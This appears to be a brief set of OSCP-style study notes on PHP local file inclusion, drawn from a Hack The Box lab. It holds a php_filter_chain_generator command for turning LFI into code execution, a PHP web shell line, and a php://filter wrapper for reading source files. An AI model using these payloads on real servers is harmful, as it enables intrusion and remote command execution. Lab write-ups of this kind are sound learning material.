// notes/ Web Exploitation
🕸️

Source Code

<figure<img src="/files/7I5gAlxQJnFBMXWN2TRT" alt=""<figcaption</figcaption</figure

#web applications#adot8
source · oscp.adot8.com · web-applications/source-code

Source Code

LFI

UpDown HTB

<figure><img src="/files/7I5gAlxQJnFBMXWN2TRT" alt=""><figcaption></figcaption></figure>
  • Direct Access set to false
  • Get the page
  • If the page doesn't have /bin, usr, home, var, etc
  • Then it does an include on the page variable and appends .php (on any file)
  • Else, it includes checker.php

RCE via PHP filters

It's possible to get command execution just through $_GET['page']

{% embed url="https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters" %}

code
01python3 php_filter_chain_generator.py --chain "<?php phpinfo(); ?>"

Take the output and append it to /?page=

<figure><img src="/files/A3t60cbELOkPngGFBLbA" alt=""><figcaption></figcaption></figure>

If system isn't a disabled function this can be used

code
01<?php system($_GET["cmd"]); ?>

{% embed url="https://github.com/RoqueNight/LFI---RCE-Cheat-Sheet" %}

Reading Local Files

We can pull the index.php file encoded in base64 using this wrapper in the GET request

code
01/?page=php://filter/convert.base64-encode/resource=index
<figure><img src="/files/DbCWUeIvnWSRwNhcWqEU" alt=""><figcaption></figcaption></figure>

Good example:

{% embed url="https://htb.adot8.com/hack-the-box/oscp-like-boxes/updown/foothold" %}

Authentication Bypass via strcmp in PHP